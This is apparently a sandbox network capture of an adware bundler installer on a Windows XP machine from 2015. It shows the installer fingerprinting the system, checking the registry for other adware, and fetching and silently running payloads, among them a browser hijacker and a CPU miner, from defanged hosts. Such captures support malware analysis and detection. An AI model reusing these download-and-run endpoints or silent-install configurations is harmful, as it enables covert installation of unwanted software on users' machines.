Date: Fri, 25 Sep 2015 20:59:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
GET /binsis/get_pre_offering_checks?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Fri, 25 Sep 2015 20:59:13 GMT
Expires: Fri, 25 Sep 2015 18:12:33 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 f989b812753677758cd8909391e239ac.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bJ7qZdd1PaK6k-GVDpBvzjf4lLWfXOeySZS98b5UrmbKqjb17Dr_aA==
37a0..<?xml version="1.0"?>.<pre_offering_checks><check type="registry" return_name="check_4" return_value_type="boolean"><value_to_check><key>HKCU\Software\Somoto\SDP</key><name>uid</name></value_to_check></check><check type="registry" return_name="check_586" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer</key><name>AppsHat</name></value_to_check></check><check type="registry" return_name="check_1842" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer\AppsHat</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2182" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Accelerator</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2246" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\YTDownloader</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2450" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HotspotShield</key><name>DisplayName</name></value_to_check></check><check type="registry" return_name="check_3850" return_value_type="boolean"><val
<<< skipped >>>
POST /binsis/xml?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: nsb32.tmp
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Content-Length: 8804
Connection: Keep-Alive
Cache-Control: no-cache
installer_data={"uid":"8A52D41A77F94021AA693531F4B425AD","muid":"bb240ea4d92fcc6bc5ca46520f398adc","affid":"vuupcntmb","sid":"vuupculwo","installerVersion":"2.2.2","osVersion":"5.1.2600 32bit","ieVersion":"6.0.2900.5512","ff_installed":"0","ff_version":"","ff_default_homepage":"not_found","ff_is_default":"0","ie_installed":"1","ie_version":"6.0.2900.5512","ie_default_homepage":"about:blank","ie_is_default":"0","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_586":"false","check_1842":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_1282":"false","check_1284":"false","check_1522":"false","check_1592":"false","check_1634":"false","check_1788":"false","check_1790":"false
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Fri, 25 Sep 2015 20:59:20 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Sep 2015 18:12:40 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 f989b812753677758cd8909391e239ac.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0v6xaVGqLR8dot9XMb3ee755wfxnNCNeuS03cJYIdr7hzVYBA2IERw==
4c0..<?xml version="1.0" encoding="windows-1252"?>.<sponsored_data><downloader><url>hXXp://sub.spirlymo.com/installers/bi_downloader/1443211351854/setup.exe</url><downloadOnInit>1</downloadOnInit><args>/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"</args></downloader><offers><offer id="istartsurf"><remote_resources/><downloader><args>_!delimiter!_ -offerId="%OfferID%" -softwareName="Istartsurf"</args></downloader><title>Special Offer</title><sub_title>To go along with your Vuupc</sub_title><download_url>hXXp://d2drfrdurj6mvo.cloudfront.net/liyan/smt_istartsurf.exe</download_url><execution_arguments>-silence -ptid=smt</execution_arguments><options><option type="v_space" height="5"/><option type="text" width="100"><id>descriptionElement</id><text><decor type="text">Make Istartsurf my browser homepage, default search and new tab</decor></text></option><option type="v_space" height="5"/><option type="text" width="100"><id>footerElement</id><text><decor type="text">By clicking Next you are agreeing to Istartsurf</decor><decor type="link" href="hXXp://VVV.istartsurf.com/license_agreement.html">Terms of Use</deco..12b8..r><decor type="text">and</decor>
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:12 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=8FB148141BB94CB98BCB1B481D21EC8E; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=8FB148141BB94CB98BCB1B481D21EC8E,1443214749.35392; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
if (window.rdp_callback) rdp_callback(1203, 142493);
GET /installers/bi_downloader/1443211351854/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sub.spirlymo.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 430280
Connection: keep-alive
Server: nginx
Date: Fri, 25 Sep 2015 20:02:52 GMT
Last-Modified: Fri, 25 Sep 2015 20:02:33 GMT
ETag: "5605a859-690c8"
Expires: Fri, 25 Sep 2015 20:12:52 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 238
X-Cache: Hit from cloudfront
Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _sCOF5yhy6C0IThTVV2ujHmEAbjFR4hwCmxutSK5EdOHKbinHOz0ZA==
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=47138
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop001.fr7.t,1443214693.cds002.fr7.c
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=b16588e178af30fb408c77953db6f401&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&te=1443214717&ts=1443214716&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:\DOCUME~1\adm\LOCALS~1\Temp\nsr18.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 25 Sep 2015 20:58:37 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 3412015665
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: gmsd_re_005010096-gmsd_re_005010096
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 406
Cache-Control: no-cache
ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcsAaJIoxT54jOVrSF2+RX+r1ugkxX7buaKejfG1TigRcOM3yZsClNi6+RKQstPciC/856Qj+eW+2Ds/sNwgcHbBD7Jseu82BMjcZoqd9m22IdjGh25xHdq7YLxw2vNXIwoP8ZbkXd9QaHFABou/P9RHNZRYT0z+v2DbKvEF6irE1i5wAqDxg41wbQqiXx3dDtQ9Nj0kd6iEQ+8xgoJnJa1RwardrhSV9zTpLGFIeaIiTokC/EfCJRVGVu8VLEGU9sG9gUZsbBf19GgqWq+j5DDk8EA/rPxA7aS+lY3ONadlXpVpiTFc4lqWGWIlIU+EwXL/Vy03LgZKMI=
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:07 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 26779
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1443214747; expires=Wed, 19 Jan 16 14:45:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443214747022937; path=/; expires=Sun, 25-Oct-15 20:59:07 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
<<< skipped >>>
GET /CPUminer/v6/Bundle_CPUminer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:43 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441897175"
Last-Modified: Thu, 10 Sep 2015 14:59:35 GMT
Cache-Control: max-age=34467
Content-Length: 104395
Content-Type: application/octet-stream
X-HW: 1443214724.dop012.fr7.t,1443214723.cds004.fr7.c
<<< skipped >>>
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: gmsd_re_005010096-1.20
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:07 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1443214747.35666; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"},{"u":0,"m":"xhamster"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"}]}},"freeze":3600,"refresh":3600,"version":116555}
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:08 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441951687"
Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT
Cache-Control: max-age=2615
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1443214689.dop006.fr7.t,1443214688.cds030.fr7.c
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=9A6B9A8C52E147EA857C4E446034B0B1; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=9A6B9A8C52E147EA857C4E446034B0B1,1443214749.68757; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
if (window.rdp_callback) rdp_callback(1203, 142493);
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 460
Connection: Keep-Alive
Cache-Control: no-cache
cnt=5abcf66d3f0dc523a5803c4e5557f120&_srvlog=NSI &browser=un&capp=nsdummy&cid=12216&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&te=1443214726&ts=1443214726&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:\DOCUME~1\adm\LOCALS~1\Temp\nsr21.tmp /ci 12216&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 25 Sep 2015 20:58:46 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 46305
Connection: keep-alive
Date: Fri, 25 Sep 2015 20:05:40 GMT
Last-Modified: Fri, 25 Sep 2015 20:00:37 GMT
ETag: "d4937ebdbcea35fc0f12233e57c30ca4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 3129
X-Cache: Hit from cloudfront
Via: 1.1 e13dc20cb35881b25fb296fb0383f55c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: y9BfFCZYn6rBqOYbS3Kp0ogsFzshOdWQ08vtiTBdcapaDD_Rzvsjlw==
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 124
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4605\",\"channel_id\": \"\", \"utm_addition\":\"vpol=som&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:24 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 91074
Connection: keep-alive
Date: Thu, 24 Sep 2015 23:30:47 GMT
Last-Modified: Thu, 24 Sep 2015 22:26:40 GMT
ETag: "029aa26a0dd5ef7bd1ba1639703f8fae"
Accept-Ranges: bytes
Server: AmazonS3
Age: 77267
X-Cache: Hit from cloudfront
Via: 1.1 bd5652a800046ffa43683320c0e731b4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0--xCiVe4KF4xhuzhsyv4CdyEdfpC8lEZXuiObvfot_2jeG3U8Xq7A==
<<< skipped >>>
GET /sdk/binsis/2.2/BiTool.dll HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d27foqb3kkzkt9.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 59904
Connection: keep-alive
Server: nginx
Date: Thu, 23 Jul 2015 01:04:56 GMT
Last-Modified: Tue, 15 Oct 2013 19:55:30 GMT
ETag: "525d9db2-ea00"
Expires: Thu, 23 Jul 2015 01:14:56 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 111
X-Cache: Hit from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Wly0idpS8MatCKxKUY8_mR9gi0IR9j6CuMgSs-wgEzo2PspQXgq0zA==
<<< skipped >>>
GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=8819 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443214692.dop012.fr7.t,1443214692.cds020.fr7.c
GIF89a.............,...........D..;
GET /installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2919 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 280T/EtK73K0JshNYAESQRraEL7QBHnCC5l7hiVFm8Q9BUU8F1NBWYW8mM8Oh4fTvZ2ub bcOHY=
x-amz-request-id: 4A2DCEF8ABFA75DD
Date: Fri, 25 Sep 2015 20:58:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=47138
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop003.fr7.t,1443214693.cds004.fr7.c
<<< skipped >>>
GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8567 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:38 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443214718.dop006.fr7.t,1443214718.cds020.fr7.c
GIF89a.............,...........D..;..
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=47125
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop005.fr7.t,1443214693.cds027.fr7.c
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=5E7A8A956FF4495188A597C64EC21ECF; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=5E7A8A956FF4495188A597C64EC21ECF,1443214749.45672; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.taxideataxus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:55 GMT
Server: Apache/2.2.16
Last-Modified: Fri, 25 Sep 2015 15:36:08 GMT
ETag: "230017b-586f10-520941b43c8d4"
Accept-Ranges: bytes
Content-Length: 5795600
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:00 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 357
Set-Cookie: conftime=1443214740; expires=Wed, 19 Jan 16 14:45:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443214740985864; path=/; expires=Sun, 25-Oct-15 20:59:00 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
GET /0.gif?2948573&101&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:25 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Set-Cookie: CountUid=a66b5300-f6pc-40d2-8fc4-e2443c4c6a10; domain=.histats.com; Max-Age=31536000; Expires=Sat, 24-Sep-2016 20:59:25 GMT
GIF89a.....
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=47125
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop003.fr7.t,1443214693.cds036.fr7.c
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:34 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1442816573"
Last-Modified: Mon, 21 Sep 2015 06:22:53 GMT
Cache-Control: max-age=34604
Content-Length: 104354
Content-Type: application/octet-stream
X-HW: 1443214714.dop004.fr7.t,1443214714.cds007.fr7.c
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
